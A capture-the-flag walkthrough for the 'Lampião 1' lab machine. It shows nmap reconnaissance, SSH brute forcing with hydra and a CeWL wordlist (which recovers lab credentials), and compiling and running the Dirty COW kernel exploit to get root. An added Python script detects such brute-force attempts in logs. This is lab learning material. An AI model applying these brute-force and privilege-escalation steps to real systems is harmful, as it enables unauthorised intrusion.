Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root! This was a great machine, as I learnt about a new Linux vulnerability, DirtyCow. Based on my experience, getting the first foothold was easy, but escalating the user rights was slightly more tricky, as it involved testing out a few different CVEs. Some research helped me identify which one to use; at the end of the day, it’s experience with privesc that helps the most.

URL: Lampião

Difficulty: Easy

Author: Tiago Tavares


Set up the machine with a host-only adapter and run an nmap ping scan to discover all the hosts on the local host-only network. My interface eth1 is host-only on my main OS (Kali Linux).

nmap -sn


Having identified the machine’s IP, we scan it for open ports with nmap and write the results to a file named “nmap” with the following command:

nmap -sS -p- -A -o "nmap"


We see port 80 open so let’s visit this port with our browser. This is the webpage:


There doesn’t seem to be much here, so I visit port 1898 in my web browser:


According to the nmap results, there were quite a few entries in the robots.txt. I’ll run a dirb scan just to find all the paths:



First, I’ll visit the robots.txt:


The above is a snippet of just the disallowed entries. I first visited the changelog.txt path:


We can identify a service and version number:

Drupal 7.54

This is worth noting in case we need to find any vulnerabilities.

I also wanted to note the potential username “tiago” I found on one of the posts:


The URL was worth investigating as well. I tried manually navigating to another post using the URL. I changed ?q=node/1 to ?q=node/2:

node 2

Another possible user, “Eder”, is highlighted in the above screenshot. There is also node 3, but it holds no new information.

I couldn’t find much more information on the web pages of this machine so I decided to go straight to brute forcing. There are 2 possible entry points: SSH (identified from our port scan) and the web site login (no admin login page found).

Let’s try brute forcing the SSH login - create a wordlist of the 2 usernames found:


user list

I will use the following hydra command:

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 ssh

-L specifies the username wordlist, -P specifies the password wordlist and -t 4 runs 4 parallel tasks.

The hydra command took too long, so I wanted to make my own wordlist, especially as this seems to be a Portuguese web server. The post at ?q=node/1 had a lot of words, so I used a tool called CeWL to crawl this web page and create a wordlist for my brute-force. Here is the command:

cewl --write passwords.txt

These are the first few lines of the wordlist we have just created:


Let’s execute the hydra command again but with this new password list:

hydra -L users.txt -P passwords.txt -t 4 ssh

hydra result

Hydra returns a set of credentials: tiago:Virgulino

Let’s use this to connect via SSH:

ssh tiago@<target IP>

ssh login

We have successfully logged in as uid tiago. Nice :)
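
For the defender's side of the hydra run above, this added example (not part of the original post) scans sshd auth-log lines for a burst of failed logins from one source followed by a successful one. The log lines, the 192.0.2.x addresses, the host name `lab`, the year and the threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the usual sshd auth.log format (not from the original post).
SAMPLE_LOG = """\
May 28 10:01:02 lab sshd[1201]: Failed password for tiago from 192.0.2.10 port 40112 ssh2
May 28 10:01:02 lab sshd[1202]: Failed password for eder from 192.0.2.10 port 40114 ssh2
May 28 10:01:04 lab sshd[1203]: Failed password for tiago from 192.0.2.10 port 40116 ssh2
May 28 10:01:05 lab sshd[1204]: Failed password for eder from 192.0.2.10 port 40118 ssh2
May 28 10:01:07 lab sshd[1205]: Failed password for tiago from 192.0.2.10 port 40120 ssh2
May 28 10:01:09 lab sshd[1206]: Failed password for invalid user admin from 192.0.2.50 port 51000 ssh2
May 28 10:01:10 lab sshd[1207]: Accepted password for tiago from 192.0.2.10 port 40122 ssh2
May 28 10:02:30 lab sshd[1208]: Failed password for eder from 192.0.2.77 port 52000 ssh2
May 28 10:02:41 lab sshd[1209]: Accepted password for eder from 192.0.2.77 port 52002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")

def find_bruteforce(log_text, threshold=5, window=timedelta(minutes=10), year=2020):
    """Flag source IPs with >= threshold failed logins inside `window`, and
    record the account if a login from that source then succeeded."""
    failures = defaultdict(list)   # ip -> timestamps of recent failures
    alerts = {}                    # ip -> alert record
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, user = m["ip"], m["user"]
        # Keep only failures that are still inside the sliding window.
        failures[ip] = [t for t in failures[ip] if ts - t <= window]
        if m["result"] == "Failed":
            failures[ip].append(ts)
            if len(failures[ip]) >= threshold:
                alert = alerts.setdefault(ip, {"failures": 0, "compromised": None})
                alert["failures"] = len(failures[ip])
        elif ip in alerts and len(failures[ip]) >= threshold:
            # Success right after a burst of failures: treat the account as compromised.
            alerts[ip]["compromised"] = user
    return alerts

if __name__ == "__main__":
    for ip, alert in find_bruteforce(SAMPLE_LOG).items():
        print(ip, alert)
```

A single mistyped password followed by a normal login, as from 192.0.2.77 in the sample, stays below the threshold and raises no alert.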

Privilege Escalation

For this machine, I will be using a script to identify any vulnerabilities on the system. This is a good script I recommend for Linux machines:

mzet Github

Let’s download this onto our local machine first:


wget script

Create an HTTP server so we can transfer this onto the victim’s machine:

python -m SimpleHTTPServer 8080


Now let’s transfer the file into the victim’s /tmp directory from our SSH shell:

cd /tmp

Make the script executable and run it:

chmod +x


The output is a list of possible exploits; I will be using this one in particular:


The vulnerability is called Dirty COW because it lies in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.

Dirty Cow Exploit

Here is a YouTube video about this exploit.

A download link is given, but the file is no longer stored there. Use this website for the script:

Source Code

As we have done before, download this script onto your local machine and create a simple HTTP server:

wget 40847.cpp
python -m SimpleHTTPServer 8080


Now transfer this file into the /tmp directory of the victim’s PC:

mv 40847 40847.cpp


Now that we have our script 40847.cpp ready, let’s compile the file:

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil


We now need to execute “dcow”:



We have been told the root password has been changed to: dirtyCowFun. Let’s change to root:

su root

We are now logged in as root!


cd /root
cat flag.txt

Written on May 28, 2020